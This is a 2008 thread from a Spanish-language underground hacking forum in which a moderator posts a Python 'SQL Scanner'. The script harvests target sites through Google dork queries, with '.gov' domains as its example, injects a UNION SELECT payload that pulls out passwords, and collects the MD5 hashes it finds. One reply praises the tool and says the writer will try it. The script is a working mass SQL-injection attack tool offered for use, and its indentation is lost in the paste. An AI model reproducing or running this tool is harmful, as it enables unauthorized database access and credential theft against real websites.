Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 11:37:33
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: SQL Scanner 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: SQL Scanner  (Leído 116 veces)
y0u-uNsEcUre
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 3529


E.0.F


Ver Perfil Email
« en: Octubre 12, 2008, 03:04:52 »


Código:
#!/usr/bin/python
#SQL Scanner that will collect hosts using a google query. Will add the
#injection code to each host and search for md5 in the source.

#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, sets, time, socket, httplib

def title():
print "\n\t   d3hydr8[at]gmail[dot]com SQL Scanner v1.0"
print "\t-----------------------------------------------"

def usage():
title()
print "\n  Usage: python SQLscan.py <options>\n"
print "\n  Example: python SQLscan.py -g inurl:'.gov' 200 -s '/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*' -write sql_found.txt -v\n"
print "\t[options]"
print "\t   -g/-google <query> <num of hosts> : Searches google for hosts"
print "\t   -s/-sql <file+injection code> : Vuln. file plux sql injection"
print "\t   -w/-write <file> : Writes potential SQL found to file"
print "\t   -v/-verbose : Verbose Mode\n"

def StripTags(text):
     finished = 0
     while not finished:
         finished = 1
         start = text.find("<")
         if start >= 0:
             stop = text[start:].find(">")
             if stop >= 0:
                 text = text[:start] + text[start+stop+1:]
                 finished = 0
     return text

def timer():
now = time.localtime(time.time())
return time.asctime(now)

def geturls(query):

counter =  10
urls = []
while counter < int(num):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls

def tester(victim):

if victim[:7] != "http://":
victim = "http://"+victim.rsplit("/",1)[0]+sql
if verbose ==1:
print "Testing:",victim
try:
source = urllib2.urlopen(victim.rsplit("/",1)[0]+sql, "80").read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
md5s = list(sets.Set(md5s))
print "\n[!] MD5 Found:",''.join([str(i) for i in victim.split("/",3)[:3]])[5:]
for md5 in md5s:
print "\t[",md5,"]\n"
found_sql.append(victim)
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass

if len(sys.argv) < 6:
usage()
sys.exit(1)
 
for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-s" or arg.lower() == "-sql":
sql = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-g" or arg.lower() == "-google":
query = sys.argv[int(sys.argv[1:].index(arg))+2]
num = sys.argv[int(sys.argv[1:].index(arg))+3]
title()
socket.setdefaulttimeout(10)
found_sql = []
count = 0
print "\n[+] SQL_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
if sql[:1] != "/":
sql = "/"+sql
print "[+] SQL:",sql
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
try:
if num.isdigit() == False:
print "\n[-] Argument [",num,"] must be a number.\n"
sys.exit(1)
else:
if int(num) <= 10:
print "\n[-] Argument [",num,"] must be greater than 10.\n"
sys.exit(1)
except(IndexError):
print "\n[-] Need number of hosts to collect.\n"
sys.exit(1)
query = re.sub("\s","+",query)
print "[+] Query:",query
print "[+] Number:",num
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "[+] Scanning hosts..."
print "\n[-] Cancel: Press Ctrl-C"
for url in urls:
tester(url)
time.sleep(3)
print "-"*65
print "\n\n[+] Potential SQL found:",len(found_sql),"\n"
time.sleep(3)
if txt != None and len(found_sql) >=1:
sql_file = open(txt, "a")
sql_file.writelines("\n\td3hydr8[at]gmail[dot]com SQL Scanner v1.0\n")
sql_file.writelines("\t------------------------------------------\n\n")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_sql:
count+=1
if txt != None:
sql_file.writelines("["+str(count)+"] "+k+"\n")
print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"
En línea
aleqiu
Colaborador
*****
Desconectado Desconectado

Mensajes: 977


Rango = Lammer = novato = newbies = hack = hackExp


Ver Perfil
« Respuesta #1 en: Octubre 12, 2008, 04:40:21 »
Muy bueno Sql Scan Ijection  Smiley voy provarlo

saludos
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: SQL Scanner « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC